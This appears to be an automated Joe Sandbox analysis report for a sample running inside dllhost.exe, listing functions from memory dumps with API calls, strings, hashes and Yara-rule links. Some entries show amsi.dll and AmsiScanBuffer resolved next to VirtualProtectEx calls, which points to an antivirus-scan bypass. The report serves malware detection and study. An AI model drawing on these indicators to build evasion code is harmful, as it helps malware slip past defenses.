Instruction ID: f0eefef6772c042791dda6a776f1f2c444fba9fadefdce53e260ee23b0a1b937
Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction Fuzzy Hash: 700103792117C082FB249B21E89879D62B2BB95B65F58C03CEE4D06366FF3EC049C700

Function 000001EF09221AD4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 000001EF09221AF4
StrCmpNIW.SHLWAPI ref: 000001EF09221B0E
lstrlenW.KERNEL32 ref: 000001EF09221B1D
StrCpyW.SHLWAPI ref: 000001EF09221B32

Strings

\\?\, xrefs: 000001EF09221B02

Memory Dump Source

Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true

Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction ID: eb124c4fa438fbf1973d1861264ad6961a7f2fa81273a2ce02b1467c789c96c0
Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction Fuzzy Hash: 02F031723046C592E7209B21E684B9D6362F784B98F888079BE4D46556EE6DC65AC700

Function 000001EF09421AD4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 000001EF09421AF4
StrCmpNIW.SHLWAPI ref: 000001EF09421B0E
lstrlenW.KERNEL32 ref: 000001EF09421B1D
StrCpyW.SHLWAPI ref: 000001EF09421B32

Strings

\\?\, xrefs: 000001EF09421B02

Memory Dump Source

Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true

Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction ID: 3745bd1763e36e9714691698399ad1807dde67d9de866a1d045ffb6c633a18b8
Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction Fuzzy Hash: F7F031763046C592EB209B21E69439DA762F788BA8FC8C039BE4D46555EE6DC64AC700

Function 000001EF0922B904 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 000001EF0922B929
GetProcAddress.KERNEL32 ref: 000001EF0922B93F
FreeLibrary.KERNEL32 ref: 000001EF0922B95B

Strings

mscoree.dll, xrefs: 000001EF0922B920
CorExitProcess, xrefs: 000001EF0922B938

Memory Dump Source

Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true

Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction ID: 9a4f613f9bf8528741280c14ae9942e11184b2df7d2425cc72eeaf2028637a99
Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction Fuzzy Hash: EEF0963121578151EA108B24D8857AD1326EBCA760F9C427DFE6D451E6EF3DC44AC700

Function 000001EF09223708 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI(?,?,00000000,000001EF0922275A), ref: 000001EF0922372A
StrCpyW.SHLWAPI ref: 000001EF0922373A
StrCatW.SHLWAPI ref: 000001EF09223746
PathCombineW.SHLWAPI(?,?,00000000,000001EF0922275A), ref: 000001EF09223754

Strings

\\.\pipe\, xrefs: 000001EF09223720

Memory Dump Source

Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true

Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction ID: 703e40fa34cf4f30feca8f46f748644d437c4da7743dad07d5fd62defb489fba
Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction Fuzzy Hash: E6F058B5714BC082EA049B12FA1419DA362AB88FC0F4C8078FE4E07B1AEE2CC4478700

Function 000001EF0942B904 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 000001EF0942B929
GetProcAddress.KERNEL32 ref: 000001EF0942B93F
FreeLibrary.KERNEL32 ref: 000001EF0942B95B

Strings

CorExitProcess, xrefs: 000001EF0942B938
mscoree.dll, xrefs: 000001EF0942B920

Memory Dump Source

Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true

Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction ID: 0c0134754269bf9e832995001080af9dcb0cdf5b65a6419cf770afa82d600d36
Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction Fuzzy Hash: 05F062392156C151EA108B24D8853AD1372EBC67B0F9CC23DFE69451E6EF2DC44AC700

Function 000001EF09423708 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI(?,?,00000000,000001EF0942275A), ref: 000001EF0942372A
StrCpyW.SHLWAPI ref: 000001EF0942373A
StrCatW.SHLWAPI ref: 000001EF09423746
PathCombineW.SHLWAPI(?,?,00000000,000001EF0942275A), ref: 000001EF09423754

Strings

\\.\pipe\, xrefs: 000001EF09423720

Memory Dump Source

Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true

Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction ID: 5d126dd7b6a97bdbd3981dacaa7a108a0f6ff49736b33c82afc367a05c5753af
Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction Fuzzy Hash: 8AF05E78314BC081EA449B22FA1419D6262BBC8FE1F8CC038FE5A07B1AEE2CC4478700

Function 000001EF09221E3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13librarysleeploaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 000001EF09221E47
GetProcAddress.KERNEL32 ref: 000001EF09221E57
Sleep.KERNEL32 ref: 000001EF09221E67

Strings

AmsiScanBuffer, xrefs: 000001EF09221E50
amsi.dll, xrefs: 000001EF09221E40

Memory Dump Source

Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true

Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd

Similarity

API ID: AddressLibraryLoadProcSleep
String ID: AmsiScanBuffer$amsi.dll
API String ID: 188063004-3248079830
Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction ID: 25181155dc60f2ee4cd4fb4597ee5215f588dcf8e7e6786a7ce31a526a3c3391
Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction Fuzzy Hash: 80D04C30616580A5E909AB11ED94B9C23636BD4B01F88847DBD4E15263FE2D855A8340

Function 000001EF09421E3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13librarysleeploaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 000001EF09421E47
GetProcAddress.KERNEL32 ref: 000001EF09421E57
Sleep.KERNEL32 ref: 000001EF09421E67

Strings

amsi.dll, xrefs: 000001EF09421E40
AmsiScanBuffer, xrefs: 000001EF09421E50

Memory Dump Source

Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true

Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd

Similarity

API ID: AddressLibraryLoadProcSleep
String ID: AmsiScanBuffer$amsi.dll
API String ID: 188063004-3248079830
Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction ID: 026a09c0f74d2d4287ef0722ec04a1babdcedae6b7ad4687bf76c5f04d12c154
Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction Fuzzy Hash: 41D04C386155C095E9196B21DD9439C22637BD4B21FD8C43DAD4E45266FE2D455A8340

Function 000001EF09225810 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000001EF09225896

Memory Dump Source

Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true

Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction ID: da009364d8b0d5cc5a96a28ae210a3e07b7ee269e8633c2112d2ffb0396eb310
Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction Fuzzy Hash: E702B632219BC486EB608B55E49079EB7A1F3C4794F144129FE8E87BA9EB7CC495CB40

Function 000001EF09425810 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000001EF09425896

Memory Dump Source

Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true

Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction ID: 705cd90541a7c2725a940fd812baf4b0ee6fbcaa47d1c829f5b88636044f9f07
Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction Fuzzy Hash: F302D736219BC086E7608B55E49039EB7A1F3C47A4F548129FE8E87BA9EB79C455CB00

Function 000001EF09222C80 Relevance: 7.6, APIs: 6, Instructions: 131COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 000001EF09222CAD
TlsGetValue.KERNEL32 ref: 000001EF09222CBC
TlsGetValue.KERNEL32 ref: 000001EF09222CCB
TlsSetValue.KERNEL32 ref: 000001EF09222E0F
TlsSetValue.KERNEL32 ref: 000001EF09222E1E
TlsSetValue.KERNEL32 ref: 000001EF09222E2D

Memory Dump Source

Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true

Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction ID: 43a1995342a3eb3f23106359947521dfe8bf1effa722fabd5521a91ea6c549e9
Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction Fuzzy Hash: 2A518035204681D7E368DB16E840A9E73A2F7C8B84F58413DBD5A43756EF39C947CB40

Function 000001EF09422C80 Relevance: 7.6, APIs: 6, Instructions: 131COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 000001EF09422CAD
TlsGetValue.KERNEL32 ref: 000001EF09422CBC
TlsGetValue.KERNEL32 ref: 000001EF09422CCB
TlsSetValue.KERNEL32 ref: 000001EF09422E0F
TlsSetValue.KERNEL32 ref: 000001EF09422E1E
TlsSetValue.KERNEL32 ref: 000001EF09422E2D

Memory Dump Source

Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true

Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction ID: 1178fdf8d8954ef988ab2be2e224426c00eb83783ef7c0080722dbcf3cf589d9
Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction Fuzzy Hash: 6F51C5392146C187E328CB16E85069E73A2F7C8BA4F98C03DBD5A43756EF79C546C700

Function 000001EF09222AB4 Relevance: 7.6, APIs: 6, Instructions: 127COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 000001EF09222AE1
TlsGetValue.KERNEL32 ref: 000001EF09222AF0
TlsGetValue.KERNEL32 ref: 000001EF09222AFF
TlsSetValue.KERNEL32 ref: 000001EF09222C3B
TlsSetValue.KERNEL32 ref: 000001EF09222C4A
TlsSetValue.KERNEL32 ref: 000001EF09222C59

Memory Dump Source

Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true

Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction ID: 584fdf4f84cb192f3556b49f2bc5f54810af97449ee10246d2abf8aec6c68b27
Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction Fuzzy Hash: 4F517C36214681D6E728CF16E840A9E73A6F7D9B84F58412DFE6A43756EF39C847CB00

Function 000001EF09422AB4 Relevance: 7.6, APIs: 6, Instructions: 127COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 000001EF09422AE1
TlsGetValue.KERNEL32 ref: 000001EF09422AF0
TlsGetValue.KERNEL32 ref: 000001EF09422AFF
TlsSetValue.KERNEL32 ref: 000001EF09422C3B
TlsSetValue.KERNEL32 ref: 000001EF09422C4A
TlsSetValue.KERNEL32 ref: 000001EF09422C59

Memory Dump Source

Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true

Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction ID: 97da8118d1bc94e9f1c99c563b5c338195179db9073c1e595c8c7109375059f6
Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction Fuzzy Hash: 955183392146C186E728CF16E85069E77A2F3C9BA4F48C12DFD5A43756EF79C846CB00

Function 000001EF09225E50 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000001EF09225E66

Memory Dump Source

Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true

Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction ID: 8268af90b495cfb2adc0fec921f304235cdd54dcc77b46ccd6fb1384db5bddf0
Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction Fuzzy Hash: D561C636129B84D6E760CB15E45079EB7A2F3C8B44F14412AFE8D47BAAEB7CC542CB04

Function 000001EF09425E50 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000001EF09425E66

Memory Dump Source

Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true

Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction ID: a0d4323661e31b6c24e6abaafc349a47004d6a02bf54f1d39b5ce827369747df
Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction Fuzzy Hash: B561E83A129BC086E760CB55E44035EB7A2F3C8758F55C12AFF8D47BA9EB79C5418B04

Function 000001EF09223EC8 Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,000001EF09223A5B), ref: 000001EF09223EDB
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001EF09223A5B), ref: 000001EF09223F0E
VirtualProtectEx.KERNEL32(?,?,?,?,?,000001EF09223A5B), ref: 000001EF09223F2E
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001EF09223A5B), ref: 000001EF09223F47
VirtualProtectEx.KERNEL32(?,?,?,?,?,000001EF09223A5B), ref: 000001EF09223F68

Memory Dump Source

Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true

Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction ID: cffd1fbd56c9c95b59e923d043c04ee05b4a4bb50f3c1552dca39796f5f486cf
Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction Fuzzy Hash: 6B110A36605780A3EB24CB21F44469E67B1FB89B80F08403AFE4D037A5FB6DC9568784

Function 000001EF09423EC8 Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,000001EF09423A5B), ref: 000001EF09423EDB
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001EF09423A5B), ref: 000001EF09423F0E
VirtualProtectEx.KERNEL32(?,?,?,?,?,000001EF09423A5B), ref: 000001EF09423F2E
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001EF09423A5B), ref: 000001EF09423F47
VirtualProtectEx.KERNEL32(?,?,?,?,?,000001EF09423A5B), ref: 000001EF09423F68

Memory Dump Source

Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true

Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
